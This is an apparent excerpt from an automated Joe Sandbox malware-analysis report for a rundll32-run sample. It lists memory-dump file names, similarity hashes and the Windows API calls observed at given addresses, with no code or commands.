                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CountTick$CurrentThread
                    • String ID:
                    • API String ID: 3968769311-0
                    • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                    • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNEL32 ref: 0040D60A
                    • GetProcAddress.KERNEL32 ref: 0040D619
                    • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AddressHandleInformationLogicalModuleProcProcessor
                    • String ID: GetLogicalProcessorInformation$kernel32.dll
                    • API String ID: 4292003513-812649623
                    • Opcode ID: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                    • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                    • Opcode Fuzzy Hash: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                    • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                    • String ID:
                    • API String ID: 3559396350-0
                    • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                    • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 1269242970-0
                    • Opcode ID: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                    • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                    • Opcode Fuzzy Hash: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                    • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID:
                    • API String ID: 1799206407-0
                    • Opcode ID: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                    • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                    • Opcode Fuzzy Hash: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                    • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32 ref: 005115CB
                      • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                    • GetLastError.KERNEL32 ref: 00511666
                      • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                      • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037500201.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037529369.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037549667.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037568860.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037591222.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037615513.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037636807.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037659731.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037684225.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037707043.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037729005.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037754010.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037779623.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037806316.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037826599.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037855236.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037889353.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037930304.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037961039.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037993144.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038014263.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038045735.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038075432.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038121994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038152677.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038180955.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038213055.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038256944.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038290533.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038316814.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038368692.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038400319.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038432274.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038468442.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038496338.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038524135.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4038557045.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                    • String ID: XLM$5B
                    • API String ID: 3390516113-4037079664
                    • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                    • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetThreadUILanguage.KERNEL32 ref: 004145B9
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                    Memory Dump Source
                    • Source File: 0000000E.00000002.4037022810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000000E.00000002.4037004347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037022810.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000E.00000002.4037474252.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
